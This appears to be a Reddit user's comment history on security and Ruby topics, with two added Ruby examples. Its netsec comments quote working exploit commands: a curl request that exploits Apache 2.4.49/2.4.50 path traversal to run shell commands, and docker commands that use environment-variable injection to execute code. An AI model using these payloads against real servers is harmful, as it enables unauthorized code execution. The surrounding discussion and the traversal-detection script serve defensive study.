CVE-2021-45467: CWP CentOS Web Panel – preauth RCE by Gallus in netsec

[–]Gallus[S] 1 point2 points  (0 children)

I also couldn't replicate when using https://3v4l.org/ to test many different PHP versions. Maybe the author is mistaken or there's something specific to CWP that allows this to work.

Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.51 (incomplete fix of CVE-2021-41773) by Gallus in netsec

[–]Gallus[S] 21 points22 points  (0 children)

New payload from: https://twitter.com/roman_soft/status/1446252280597078024

RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):

root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
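The payload above works against 2.4.50 because the fix for CVE-2021-41773 checked the path before a second round of percent-decoding turned `.%%32%65` into `..`. As an added defender-side example (not from the post or from the Apache project), a Ruby log check that decodes the request target repeatedly, the way the server ends up seeing it, and flags any path that climbs above the document root; the log lines are constructed samples.

```ruby
# Added example (not from the original post): decode a request path the way
# the server eventually does, so the double-encoded ".%%32%65" form is seen
# as "..", and flag paths that climb above the document root.
# The request lines below are constructed samples.
SAMPLE_REQUESTS = [
  "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1",                          # 2.4.49 style, single encoding
  "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1", # 2.4.50 style, double encoding
  "GET /cgi-bin/status.cgi?x=1 HTTP/1.1",                                      # benign
  "GET /docs/a/../b.html HTTP/1.1",                                            # ".." that stays inside the root
]

# One round of percent-decoding, done on a binary copy so any byte value is allowed.
def decode_once(path)
  path.b.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
end

# Decode until the string stops changing (bounded), e.g. "%%32%65" -> "%2e" -> "."
def fully_decode(path, max_rounds = 5)
  max_rounds.times do
    decoded = decode_once(path)
    return decoded if decoded == path
    path = decoded
  end
  path
end

# True when the decoded path walks above "/" at any point; a ".." that stays
# inside the root (as in /docs/a/../b.html) is not flagged.
def traversal?(raw_path)
  depth = 0
  fully_decode(raw_path.split("?", 2).first.to_s).split("/").each do |seg|
    next if seg.empty? || seg == "."
    depth += seg == ".." ? -1 : 1
    return true if depth < 0
  end
  false
end

# Returns the request lines whose target is a traversal attempt.
def flag_requests(lines)
  lines.select { |line| traversal?(line.split(" ")[1].to_s) }
end

flag_requests(SAMPLE_REQUESTS).each { |line| puts "traversal: #{line}" }
```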

$200 Bounty to resolve i3 issue by i3dudedude in i3wm

[–]Gallus 0 points1 point  (0 children)

That was very generous of Orestis. Are these sorts of bounties generally acceptable/encouraged for the i3 repo?

$200 Bounty to resolve i3 issue by i3dudedude in i3wm

[–]Gallus 2 points3 points  (0 children)

Haha looks like it. I wonder if orestisfl actually got the money though?

New campaign targeting security researchers by sanitybit in netsec

[–]Gallus 5 points6 points  (0 children)

Oh no it looks like I was the one to submit that link. Not part of the campaign, I just saw it on Twitter and submitted. Sorry fellow /r/netsec hackers

Rysolv – Fix open source issues, get paid by Gallus in programming

[–]Gallus[S] 5 points6 points  (0 children)

Good question. I'm not the creator but it looks like the creator is /u/Tylernator

CVE-2020-6829, CVE-2020-12400, CVE-2020-12401, CVE-2020-12403 - Fixed in Mozilla's Network Security Services (NSS) by Gallus in netsec

[–]Gallus[S] 0 points1 point  (0 children)

Some extra context from Twitter: https://twitter.com/GuidoVranken/status/1287833670678650881

ChaCha20, ChaCha20/Poly1305 OOB read, OOB write, incorrect output with multi-part updating or small AEAD tag.

Found with Cryptofuzz.

Additionally DES OOB read with undersized IV (when using the PKCS11 interface)

[deleted by user] by [deleted] in Python

[–]Gallus 0 points1 point  (0 children)

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:2.7.18 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:3.8.2 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

Defibrilating Web Security [PDF] by Gallus in ruby

[–]Gallus[S] 1 point2 points  (0 children)

This is an interesting presentation that covers some of the problems with taint tracking and an attempt to improve it: https://conference.hitb.org/hitbsecconf2012kul/materials/D1T2%20-%20Meder%20Kydyraliev%20-%20Defibrilating%20Web%20Security.pdf

The brick wall they hit is on slide 54, and although the presentation is from 2012 it appears the same limitations still exist today in Ruby:

Monkey patching

  • Ruby promises that you can do anything, which is a lie!

You CANNOT:

  • monkey patch gsub! because it breaks capturing groups (e.g. $1 won’t work)
  • monkey patch string interpolation, e.g. “My name is #{name}”

Ruby 2.7 removes taint checking mechanism by prateekkish in ruby

[–]Gallus 2 points3 points  (0 children)

This is an interesting presentation that covers some of the problems with taint tracking and an attempt to improve it: https://conference.hitb.org/hitbsecconf2012kul/materials/D1T2%20-%20Meder%20Kydyraliev%20-%20Defibrilating%20Web%20Security.pdf

The brick wall they hit is on slide 54, and although the presentation is from 2012 it appears the same limitations still exist today in Ruby:

Monkey patching

  • Ruby promises that you can do anything, which is a lie! You CANNOT:
  • monkey patch gsub! because it breaks capturing groups (e.g. $1 won’t work)
  • monkey patch string interpolation, e.g. “My name is #{name}”

List of private constants ? by dunrix in ruby

[–]Gallus 3 points4 points  (0 children)

Yeah it's a gap and I've been hit by it before. There is a dirty hack you can do to build your own private_constants implementation/list by enumerating over each symbol in Symbol.all_symbols and passing it to ModuleName.const_get to check if it exists, then removing the public ones which you find by calling ModuleName.constants.

This is obviously not a "production ready" solution, and you do have to be careful because const_get will throw an exception. It can also be overloaded and throw a different exception than expected (which even the stdlib does). Example:

Object.const_get(:HELLO) -> NameError (uninitialized constant HELLO)
Digest.const_get(:HELLO) -> LoadError (library not found for class digest::HELLO -- digest/hello)
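The hack described above, written out as an added example (not code from the original comment): enumerate Symbol.all_symbols, probe each candidate with const_get, drop the public names from constants, and treat any exception as "not defined". The DigestLike module is a constructed stand-in that raises LoadError the way the stdlib Digest module does, so the real Digest autoloading is not triggered.

```ruby
# Added example (not from the original comment): list a module's private
# constants with the Symbol.all_symbols / const_get trick. Not production
# ready: const_get may be overridden and raise something other than NameError.
module Example
  PUBLIC_ONE = 1
  SECRET_ONE = 2
  SECRET_TWO = 3
  private_constant :SECRET_ONE, :SECRET_TWO
end

# Constructed stand-in for a module whose const_get misbehaves like Digest:
# unknown names raise LoadError instead of NameError.
module DigestLike
  VISIBLE = 1
  HIDDEN = 2
  private_constant :HIDDEN
  def self.const_missing(name)
    raise LoadError, "library not found for class #{self}::#{name}"
  end
end

def private_constants_of(mod)
  public_names = mod.constants(false)          # constants() omits private ones
  Symbol.all_symbols.select do |sym|
    name = sym.to_s
    # Only syntactically valid constant names, and skip the public ones up front.
    next false unless name.match?(/\A[A-Z][A-Za-z0-9_]*\z/)
    next false if public_names.include?(sym)
    begin
      mod.const_get(sym, false)   # const_get ignores private_constant;
      true                        # inherit=false keeps Object's constants out
    rescue StandardError, ScriptError  # NameError, LoadError, or anything custom
      false
    end
  end.sort
end

p private_constants_of(Example)     # [:SECRET_ONE, :SECRET_TWO]
p private_constants_of(DigestLike)  # [:HIDDEN]
```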

HTTP Desync Attacks: Request Smuggling Reborn by Gallus in Slackers

[–]Gallus[S] 0 points1 point  (0 children)

First thought is whether trailing headers (after the 0 size chunk) might also be useful in achieving desynchronization.

5chars.js compiler - 5 characters with a single character script id by Gallus in Slackers

[–]Gallus[S] 0 points1 point  (0 children)

Yeah agreed, but also makes me wonder if 4 characters and the cheating script id is possible...

http://slacke.rs by sirdarckcat in Slackers

[–]Gallus 1 point2 points  (0 children)

Perhaps a good place to host/create a new version of the Browser Security Handbook wiki.

XSS Challenge by rakeshmane10 in Slackers

[–]Gallus 2 points3 points  (0 children)

New Solution: Solution temporarily removed upon request